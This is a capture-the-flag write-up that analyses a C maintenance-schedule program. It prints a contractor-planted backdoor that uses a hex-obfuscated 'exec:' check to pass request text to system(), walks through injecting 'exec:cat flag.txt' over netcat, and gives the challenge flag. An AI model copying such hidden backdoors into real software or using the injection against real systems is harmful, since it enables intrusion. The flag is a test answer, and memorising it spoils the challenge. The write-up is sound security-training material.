Challenge Overview
In this challenge, we are tasked with analyzing a Maintenance Schedule Management application for potential backdoors introduced by an external contractor. We’ll review the provided source code to identify any malicious functionalities and then connect to the live service to validate our findings.
Steps to Solve
1. Analyzing the Source Code
Upon examining the provided source code, we notice a suspicious condition within the markRequestCompleted function:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Record layout assumed from the offsets used below (not shown in the excerpt):
   a 264-byte stride with the description starting at byte 4. */
struct Request { int id; char description[256]; int isCompleted; };
extern struct Request requests[];
extern int requestCount;
void saveRequests(void);

void markRequestCompleted() {
    int id;
    printf("Enter the ID of the request to mark as completed: ");
    scanf("%d", &id);
    for (int i = 0; i < requestCount; i++) {
        /* Backdoor: if the description begins with "exec:" (written as hex to hide it),
           the rest of the description is handed to system(); the ",1" and ":1" branches
           make the ternary evaluate to true either way, so the id match alone decides. */
        if (requests[i].id == id && (strncmp((char *)requests+i*264+4,"\x65\x78\x65\x63\x3a",5)==0?system((char *)requests+i*264+9),1:1)) {
            requests[i].isCompleted = 1;
            saveRequests();
            printf("Request marked as completed.\n");
            return;
        }
    }
    printf("Request with ID %d not found.\n", id);
    return;
}
Let’s break down the suspicious part:
- Condition Check: The if statement includes a strncmp call that compares the bytes at offset 4 of the i-th 264-byte request record (the start of its description) to the string "exec:" (written in hexadecimal as \x65\x78\x65\x63\x3a so it does not stand out in the source).
- Conditional Execution: If the comparison is true, it executes system((char *)requests+i*264+9), which runs a system command starting from the 10th byte of the request’s memory location, i.e. the text after the "exec:" prefix. Because of the comma operator (system(...),1) and the else branch (:1), the ternary is always true, so the request is still marked completed whether or not the command runs.
This indicates a hidden functionality where, if a request’s description starts with "exec:", the application will execute the subsequent text as a system command.
2. Exploiting the Backdoor
To leverage this backdoor:
- Add a New Maintenance Request: When prompted for the description, input a command prefixed with "exec:". For example: “exec:cat flag.txt”
- Mark the Request as Completed: Choose the option to mark a request as completed and enter the ID of the request you just added.
By doing this, the application will execute the command cat flag.txt, displaying the contents of the flag.txt file.
3. Connecting to the Live Service
With our strategy in place, let’s connect to the live service using nc (Netcat):
nc kubenode.mctf.io 30014
Follow these steps:
- Add a Maintenance Request:
  - Select the option to add a new request.
  - Enter the description: exec:cat flag.txt
- Mark the Request as Completed:
  - Choose the option to mark a request as completed.
  - Enter the ID of your newly added request.
Upon completion, the application should display the contents of flag.txt, revealing the flag.
Conclusion
By carefully analyzing the source code, we identified a hidden backdoor that executes system commands prefixed with "exec:" in the request description. Exploiting this, we successfully retrieved the flag from the live service.
Flag: MetaCTF{4lw4ys_r34d_4ll_7h3_c0d3}